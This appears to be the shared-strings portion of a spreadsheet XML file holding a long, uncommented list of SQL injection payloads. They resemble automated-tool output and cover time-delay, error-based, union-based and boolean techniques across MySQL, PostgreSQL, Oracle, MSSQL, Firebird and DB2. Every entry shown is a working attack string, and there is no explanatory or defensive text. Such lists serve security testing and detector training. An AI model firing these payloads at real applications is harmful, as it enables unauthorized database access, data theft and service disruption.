    <t>1', ( select  ( case when  ( 8640 = 8640 )  then  ( ascii ( regexp_substring ( repeat ( right ( char ( 8640 ) ,0 ) ,500000000 ) ,null  )  )   )  else 8640/ ( select 0 from information_schema.system_users )  end )  from information_schema.system_users ) --</t>
  </si>
  <si>
    <t>select  ( case when  ( 8857 = 1512 )  then 8857 else 8857* ( select 8857 from mysql.db )  end ) #</t>
  </si>
  <si>
    <t>1' )  where 1600 = 1600 or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>-3009'+ ( select 'gqbo' where 6915 = 6915 union all select 6915,6915--</t>
  </si>
  <si>
    <t>1"  )  )   as casz where 5921 = 5921 rlike  ( select * from  ( select ( sleep ( 5  )  )   ) vwyq ) #</t>
  </si>
  <si>
    <t>1' in boolean mode )  union all select null,null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>-4915' union all select 1928,1928,1928,1928#</t>
  </si>
  <si>
    <t xml:space="preserve">1  )  )   ) </t>
  </si>
  <si>
    <t>-8940" )  or 4144 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4144 = 4144 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 1</t>
  </si>
  <si>
    <t>1 )  where 5261 = 5261 and elt ( 1210 = 1210,sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>1'+ ( select 'myrb' where 3622 = 3622 and 6510 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7  )  )  +'</t>
  </si>
  <si>
    <t xml:space="preserve">1', ( select * from generate_series ( 5609,5609,case when  ( 5609 = 5609 )  then 1 else 0 end )  limit 1 ) </t>
  </si>
  <si>
    <t>select pg_sleep ( 5 )  and '%' = '</t>
  </si>
  <si>
    <t>select dbms_pipe.receive_message ( chr ( 66 ) ||chr ( 67 ) ||chr ( 79 ) ||chr ( 101 ) ,5 )  from dual and 'hvqt' = 'hvqt</t>
  </si>
  <si>
    <t>1  )  )   and sleep ( 5 )  and   (  (  9084 = 9084</t>
  </si>
  <si>
    <t>1%'  )  )   and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and   (  (  '%' = '</t>
  </si>
  <si>
    <t>-7119" )  or 5903 =  ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' )  and  ( "rmzm" = "rmzm</t>
  </si>
  <si>
    <t>-7561 )  as ilrm where 8828 = 8828 or 5903 =  ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' ) --</t>
  </si>
  <si>
    <t>1  )  )   )  and  ( 6148 = 3343 ) *3343 and   (  (   ( 3271 = 3271</t>
  </si>
  <si>
    <t>1  )  )   as hxtp where 5478 = 5478 and 8594 =  ( select 8594 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>1'  )  )   )  and  ( 3020 = 3020 ) *6703 and   (  (   ( 'ujds' = 'ujds</t>
  </si>
  <si>
    <t>1'+ ( select acax where 4169 = 4169 or 5286 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5  )  )  +'</t>
  </si>
  <si>
    <t>1  )  )   and 8635 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>1' )  as hlbq where 2347 = 2347 and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 6055 = 6055 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   ) --</t>
  </si>
  <si>
    <t>select  ( case when  ( 1868 = 5071 )  then 1 else 1868* ( select 1868 from master..sysdatabases )  end ) --</t>
  </si>
  <si>
    <t>1%" union all select null,null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>-2210' or 5903 =  ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' )  and 'myvr' like 'myvr</t>
  </si>
  <si>
    <t>1'  )  )   and 3707 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 )  and   (  (  'tkcy' like 'tkcy</t>
  </si>
  <si>
    <t>1 )  where 9078 = 9078 rlike sleep ( 5 ) #</t>
  </si>
  <si>
    <t>-5569' )  as cjaf where 3753 = 3753 union all select 3753#</t>
  </si>
  <si>
    <t>waitfor delay '0:0:5' and "cvqn" like "cvqn</t>
  </si>
  <si>
    <t>-8655 )  where 3910 = 3910 union all select 3910,3910#</t>
  </si>
  <si>
    <t>-3667%'  )  )   union all select 3560,3560,3560--</t>
  </si>
  <si>
    <t>1'  )  )   and elt ( 4249 = 4249,7259 )  and   (  (  'xjns' = 'xjns</t>
  </si>
  <si>
    <t>1' where 8729 = 8729</t>
  </si>
  <si>
    <t>select sleep ( 5 )  and   (  (  "twed" like "twed</t>
  </si>
  <si>
    <t>1"  )  )   )  and 8514 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 )  and   (  (   ( "xtyt" = "xtyt</t>
  </si>
  <si>
    <t>1%' union all select null--</t>
  </si>
  <si>
    <t xml:space="preserve">1, ( select  ( case when  ( 3902 = 3902 )  then  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 )  else 1/ ( select 0 from dual )  end )  from dual ) </t>
  </si>
  <si>
    <t>1 )  where 9371 = 9371 union all select null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>1 )  and 7533 = 7533</t>
  </si>
  <si>
    <t>-4371'  )  )   )  union all select 7465,7465,7465,7465,7465,7465,7465#</t>
  </si>
  <si>
    <t>1 )  where 6039 = 6039 and 2853 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 2853 = 2853 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric ) --</t>
  </si>
  <si>
    <t>1%" )  rlike  ( select  ( case when  ( 7689 = 7689 )  then 1 else 0x28 end  )  )   and  ( "%" = "</t>
  </si>
  <si>
    <t>1'  )  )   or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and   (  (  'dreq' = 'dreq</t>
  </si>
  <si>
    <t>-3017"  )  )   as ljit where 9128 = 9128 union all select 9128,9128,9128,9128,9128--</t>
  </si>
  <si>
    <t>1" )  as bksv where 5375 = 5375</t>
  </si>
  <si>
    <t>1'  )  )   union all select null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>-5147 or  ( 8459 = 8459 ) *4906</t>
  </si>
  <si>
    <t>-3632' or make_set ( 9354 = 9354,7185 )  and 'lgpy' like 'lgpy</t>
  </si>
  <si>
    <t>1"  )  )   as jebl where 3464 = 3464</t>
  </si>
  <si>
    <t xml:space="preserve">1',exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 7759 = 7759,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )  </t>
  </si>
  <si>
    <t>call regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and  ( "pdqm" like "pdqm</t>
  </si>
  <si>
    <t xml:space="preserve">1" and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  </t>
  </si>
  <si>
    <t>1'  )  )   )  procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50  )  )    )  )   ) ,1 )  and   (  (   ( 'aqdj' = 'aqdj</t>
  </si>
  <si>
    <t>1'  )  )   or 8466 = benchmark ( 5000000,md5 ( 0x694a4745  )  )   and   (  (  'ossj' = 'ossj</t>
  </si>
  <si>
    <t>1'+ ( select 'jaok' where 2592 = 2592</t>
  </si>
  <si>
    <t>1'+ ( select 'kcix' where 1117 = 1117</t>
  </si>
  <si>
    <t xml:space="preserve"> ( select * from  ( select ( sleep ( 5  )  )   ) acdk ) #</t>
  </si>
  <si>
    <t>1' where 1093 = 1093 union all select null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>1" and 8148 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>1 )  as idvt where 3490 = 3490 and 9660 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>1 where 1568 = 1568 or  ( select * from  ( select ( sleep ( 5  )  )   ) sddo ) #</t>
  </si>
  <si>
    <t xml:space="preserve">1' or 6793 =  ( select 6793 from pg_sleep ( 5  )  )  </t>
  </si>
  <si>
    <t>1'  )  )   )  and 6991 = 5579</t>
  </si>
  <si>
    <t>1" )  as jqli where 7793 = 7793</t>
  </si>
  <si>
    <t>1  )  )   and 8189 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t xml:space="preserve">1,iif ( 6333 = 1227,1,1/0 ) </t>
  </si>
  <si>
    <t>1' where 4150 = 4150 and elt ( 8012 = 6026,6026 ) --</t>
  </si>
  <si>
    <t>1' )  or  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8113 = 8113,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   )  and  ( 'lxoc' = 'lxoc</t>
  </si>
  <si>
    <t>select * from generate_series ( 7667,7667,case when  ( 7667 = 8232 )  then 1 else 0 end )  limit 1--</t>
  </si>
  <si>
    <t>1"  )  )   )  or 4411 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 )  and   (  (   ( "nrhz" like "nrhz</t>
  </si>
  <si>
    <t>1'|| ( select 'sxya' where 3578 = 3578</t>
  </si>
  <si>
    <t>1' or sleep ( 5 )  and 'yudo' = 'yudo</t>
  </si>
  <si>
    <t>1%' or sleep ( 5 ) #</t>
  </si>
  <si>
    <t>1 )  where 6424 = 6424</t>
  </si>
  <si>
    <t xml:space="preserve">-6014" or make_set ( 3003 = 2609,2609 ) </t>
  </si>
  <si>
    <t xml:space="preserve">1, ( select  ( case when  ( 5154 = 5154 )  then 1 else 5154* ( select 5154 from master..sysdatabases )  end  )  )  </t>
  </si>
  <si>
    <t>1  )  )   and row ( 6237,7469 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 6237 = 6237,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x )  and   (  (  9325 = 9325</t>
  </si>
  <si>
    <t xml:space="preserve">-7720  )  )   or 2724 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 2724 = 2724 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( </t>
  </si>
  <si>
    <t>1 )  as uuro where 6784 = 6784</t>
  </si>
  <si>
    <t>1' )  where 1804 = 1804 procedure analyse ( extractvalue ( 9627,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x4b774c75  )  )    )  )   ) ,1 ) #</t>
  </si>
  <si>
    <t>-6550' )  where 1675 = 1675 union all select 1675,1675,1675,1675,1675,1675,1675--</t>
  </si>
  <si>
    <t>1%' )  and 3824 = benchmark ( 5000000,md5 ( 0x76555642  )  )   and  ( '%' = '</t>
  </si>
  <si>
    <t>select benchmark ( 5000000,md5 ( 0x714e4153  )  )  #</t>
  </si>
  <si>
    <t>1 and 2853 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 2853 = 2853 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric ) # cykf</t>
  </si>
  <si>
    <t>1 )  or  ( select * from  ( select ( sleep ( 5  )  )   ) sddo ) #</t>
  </si>
  <si>
    <t>1 )  as rnfb where 2405 = 2405 or 8514 = benchmark ( 5000000,md5 ( 0x544d5a4c  )  )  #</t>
  </si>
  <si>
    <t>-4406%' union all select 9599,9599,9599,9599#</t>
  </si>
  <si>
    <t>-8754"  )  )   )  union all select 7391,7391,7391,7391,7391,7391,7391--</t>
  </si>
  <si>
    <t>1' or  ( select * from  ( select ( sleep ( 5  )  )   ) ydpu )  and 'bwtk' = 'bwtk</t>
  </si>
  <si>
    <t xml:space="preserve">1 and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  </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</si>
  <si>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</si>
  <si>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1" )  as xwnu where 6490 = 6490 union all select null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>1  )  )   as fwru where 5262 = 5262 and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 4241 = 4241 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   ) --</t>
  </si>
  <si>
    <t>1' and 2716 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>1%'  )  )   rlike sleep ( 5 ) #</t>
  </si>
  <si>
    <t>1  )  )   rlike  ( select  ( case when  ( 7689 = 7689 )  then 1 else 0x28 end  )  )   and   (  (  4279 = 4279</t>
  </si>
  <si>
    <t>1"  )  )   )  or 8421 =  ( select count ( * )  from generate_series ( 1,5000000  )  )   and   (  (   ( "ugtw" = "ugtw</t>
  </si>
  <si>
    <t xml:space="preserve"> end--</t>
  </si>
  <si>
    <t>-8557 or 1 group by concat ( 0x7171706a71, ( select  ( case when  ( 4232 = 4232 )  then 1 else 0 end  )  )  ,0x717a767a71,floor ( rand ( 0 ) *2  )  )   having min ( 0 ) #</t>
  </si>
  <si>
    <t>-4324 order by 1--</t>
  </si>
  <si>
    <t>1" )  as dgzf where 4834 = 4834</t>
  </si>
  <si>
    <t>1 )  as gfhf where 5804 = 5804 or 6793 =  ( select 6793 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>-9924  )  )   as zgqa where 2867 = 2867 union all select 2867,2867,2867,2867,2867,2867,2867,2867,2867,2867#</t>
  </si>
  <si>
    <t>-6440  )  )   )  union all select 3316,3316,3316,3316,3316,3316,3316,3316,3316,3316--</t>
  </si>
  <si>
    <t>select benchmark ( 5000000,md5 ( 0x4c4d6142  )  )   ) ||'</t>
  </si>
  <si>
    <t>1' in boolean mode )  rlike  ( select  ( case when  ( 7689 = 7689 )  then 1 else 0x28 end  )  )  #</t>
  </si>
  <si>
    <t xml:space="preserve">1' )  and 7756 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 7756 = 7756 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   ) </t>
  </si>
  <si>
    <t>1%'  )  )   or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and   (  (  '%' = '</t>
  </si>
  <si>
    <t>1" where 6785 = 6785 and 3580 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>1' )  as pkis where 3446 = 3446 or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5 ) --</t>
  </si>
  <si>
    <t>1'  )  )   and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and   (  (  'ngwt' = 'ngwt</t>
  </si>
  <si>
    <t>1' where 8469 = 8469</t>
  </si>
  <si>
    <t>1  )  )   as hrks where 7637 = 7637 or elt ( 6272 = 6272,sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>1' rlike sleep ( 5 ) #</t>
  </si>
  <si>
    <t>1%"  )  )   and 3824 = benchmark ( 5000000,md5 ( 0x76555642  )  )   and   (  (  "%" = "</t>
  </si>
  <si>
    <t>1  )  )   )  union all select null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>-7345 )  union all select 3866#</t>
  </si>
  <si>
    <t>select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 and   (  (  "tbcc" = "tbcc</t>
  </si>
  <si>
    <t>1 and 3707 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) -- xlfz</t>
  </si>
  <si>
    <t>1" )  where 9855 = 9855</t>
  </si>
  <si>
    <t>1" )  where 9248 = 9248</t>
  </si>
  <si>
    <t>1" )  as sraw where 1997 = 1997 and  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 3484 = 3484,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   ) --</t>
  </si>
  <si>
    <t>1'|| ( select 'nvvm' from dual where 5567 = 5567 rlike  ( select * from  ( select ( sleep ( 5  )  )   ) sgvo  )  )  ||'</t>
  </si>
  <si>
    <t>-1692' )  union all select 7074,7074,7074,7074,7074,7074,7074#</t>
  </si>
  <si>
    <t>1' )  or row ( 1045,7562 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 1045 = 1045,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x )  and  ( 'cogk' = 'cogk</t>
  </si>
  <si>
    <t>1'  )  )   and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 4241 = 4241 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and   (  (  'wzrj' = 'wzrj</t>
  </si>
  <si>
    <t>1' or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 1808 = 1808,1  )  )   ) ,0x717a767a71 ) ,8666 )  and 'vvkl' = 'vvkl</t>
  </si>
  <si>
    <t>1 )  as vzyk where 5103 = 5103 and 8312 = dbms_pipe.receive_message ( chr ( 69 ) ||chr ( 79 ) ||chr ( 101 ) ||chr ( 68 ) ,5 ) --</t>
  </si>
  <si>
    <t xml:space="preserve"> ( select * from generate_series ( 3906,3906,case when  ( 3906 = 3906 )  then 1 else 0 end )  limit 1 ) </t>
  </si>
  <si>
    <t>1%" )  or extractvalue ( 1297,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 1297 = 1297,1  )  )   ) ,0x717a767a71  )  )   and  ( "%" = "</t>
  </si>
  <si>
    <t>select case when 7717 = 7717 then 1 else null end--</t>
  </si>
  <si>
    <t>1"  )  )   and 2388 = benchmark ( 5000000,md5 ( 0x6d457153  )  )  #</t>
  </si>
  <si>
    <t>1' in boolean mode )  or 5356 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>1  )  )   as dqfl where 7527 = 7527</t>
  </si>
  <si>
    <t>1%" )  union all select null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>1%'  )  )   and 2006 = 2006</t>
  </si>
  <si>
    <t>1'+ ( select 'stdl' where 4581 = 4581</t>
  </si>
  <si>
    <t>1  )  )   as avdz where 1881 = 1881 and 6510 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t xml:space="preserve">exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 1049 = 1049,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )  </t>
  </si>
  <si>
    <t>1%'  )  )   and 4595 = 4595#</t>
  </si>
  <si>
    <t>1%"  )  )   and  ( 3020 = 3020 ) *6703 and   (  (  "%" = "</t>
  </si>
  <si>
    <t>1' or 8466 = benchmark ( 5000000,md5 ( 0x694a4745  )  )   and 'ntaw' = 'ntaw</t>
  </si>
  <si>
    <t>1 )  and 7756 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 7756 = 7756 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and  ( 3836 = 3836</t>
  </si>
  <si>
    <t>1'  )  )   )  or elt ( 6272 = 6272,sleep ( 5  )  )   and   (  (   ( 'pded' = 'pded</t>
  </si>
  <si>
    <t>1'|| ( select 'yhkt' from dual where 7105 = 7105 or row ( 1045,7562 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 1045 = 1045,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x  )  )  ||'</t>
  </si>
  <si>
    <t xml:space="preserve">1, ( begin if  ( 8340 = 8340 )  then dbms_lock.sleep ( 5 ) </t>
  </si>
  <si>
    <t>1'  )  )   as xrre where 1172 = 1172 and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 3393 = 3393,1  )  )   ) ,0x717a767a71 ) ,1161 ) --</t>
  </si>
  <si>
    <t>1"  )  )   procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select  ( case when  ( 5840 = 5840 )  then 1 else 0 end  )  )  ,0x717a767a71  )  )  ,1 )  and   (  (  "jzbb" = "jzbb</t>
  </si>
  <si>
    <t>1'  )  )   as cmll where 7948 = 7948 and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4386 = 4386 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )  --</t>
  </si>
  <si>
    <t>1' rlike  ( select * from  ( select ( sleep ( 5  )  )   ) vwyq ) #</t>
  </si>
  <si>
    <t>1'  )  )   union all select null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>1'  )  )   as xirr where 2425 = 2425</t>
  </si>
  <si>
    <t>1'  )  )   and make_set ( 8403 = 8403,8899 )  and   (  (  'sxgl' = 'sxgl</t>
  </si>
  <si>
    <t>1  )  )   or row ( 1045,7562 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 1045 = 1045,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x )  and   (  (  8294 = 8294</t>
  </si>
  <si>
    <t>-4595' )  where 4892 = 4892 order by 1--</t>
  </si>
  <si>
    <t>1%"  )  )   and row ( 6237,7469 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 6237 = 6237,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x )  and   (  (  "%" = "</t>
  </si>
  <si>
    <t>1 )  where 6472 = 6472</t>
  </si>
  <si>
    <t>select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 and 'bnfu' like 'bnfu</t>
  </si>
  <si>
    <t>1  )  )   and  ( 4169 = 9887 ) *9887 and   (  (  1137 = 1137</t>
  </si>
  <si>
    <t>-6405 )  as ilah where 5145 = 5145 union all select 5145,5145,5145,5145,5145--</t>
  </si>
  <si>
    <t>1' )  or sleep ( 5 )  and  ( 'fizk' = 'fizk</t>
  </si>
  <si>
    <t>-9340 )  where 5462 = 5462 or 3038 = 3038</t>
  </si>
  <si>
    <t>1  )  )   as xbii where 2262 = 2262 or sleep ( 5 ) --</t>
  </si>
  <si>
    <t>1 order by 1#</t>
  </si>
  <si>
    <t>select count ( * )  from generate_series ( 1,5000000 ) # fnck</t>
  </si>
  <si>
    <t>1'+ ( select 'tzey' where 4491 = 4491 union all select null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>select  ( case when  ( 4006 = 1276 )  then 1 else 4006* ( select 4006 from master..sysdatabases )  end ) --</t>
  </si>
  <si>
    <t>-5027%"  )  )   or 5903 =  ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' )  and   (  (  "%" = "</t>
  </si>
  <si>
    <t>1  )  )   )  order by 1#</t>
  </si>
  <si>
    <t>1' and 3580 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>-6254" where 8941 = 8941 or elt ( 1032 = 1032,3623 ) --</t>
  </si>
  <si>
    <t>-3411'  )  )   )  union all select 3185,3185,3185,3185,3185,3185,3185,3185--</t>
  </si>
  <si>
    <t>1'  )  )   and  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 3484 = 3484,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   )  and   (  (  'yzdp' = 'yzdp</t>
  </si>
  <si>
    <t>1%' or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 1808 = 1808,1  )  )   ) ,0x717a767a71 ) ,8666 )  and '%' = '</t>
  </si>
  <si>
    <t>waitfor delay '0:0:5' and   (  (   ( 'ozjl' like 'ozjl</t>
  </si>
  <si>
    <t>1" )  as vcvw where 2445 = 2445 and 8594 =  ( select 8594 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>1'  )  )   union all select null,null,null--</t>
  </si>
  <si>
    <t>-3083 )  or 5221 = 7829</t>
  </si>
  <si>
    <t>1 or row ( 1045,7562 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 1045 = 1045,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x ) -- fwzl</t>
  </si>
  <si>
    <t>select pg_sleep ( 5 )  and   (  (   ( 9476 = 9476</t>
  </si>
  <si>
    <t>-3422%' )  or 5903 =  ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' )  and  ( '%' = '</t>
  </si>
  <si>
    <t>1'  )  )   and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 6055 = 6055 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and   (  (  'cbwx' = 'cbwx</t>
  </si>
  <si>
    <t xml:space="preserve">1' )  and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  </t>
  </si>
  <si>
    <t>1'+ ( select dklj where 3265 = 3265</t>
  </si>
  <si>
    <t>1' )  where 7391 = 7391 or  ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9173 = 9173,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a ) --</t>
  </si>
  <si>
    <t>1'  )  )   and row ( 6237,7469 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 6237 = 6237,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x )  and   (  (  'pbtf' = 'pbtf</t>
  </si>
  <si>
    <t xml:space="preserve">1 rlike  ( select * from  ( select ( sleep ( 5  )  )   ) sgvo ) </t>
  </si>
  <si>
    <t>select  ( case when  ( 4660 = 4660 )  then 4660 else cast ( 1 as int ) / ( select 0 from dual )  end )  from dual--</t>
  </si>
  <si>
    <t>-6125'|| ( select 'hwnm' where 1428 = 1428 union all select 1428,1428,1428,1428,1428,1428#</t>
  </si>
  <si>
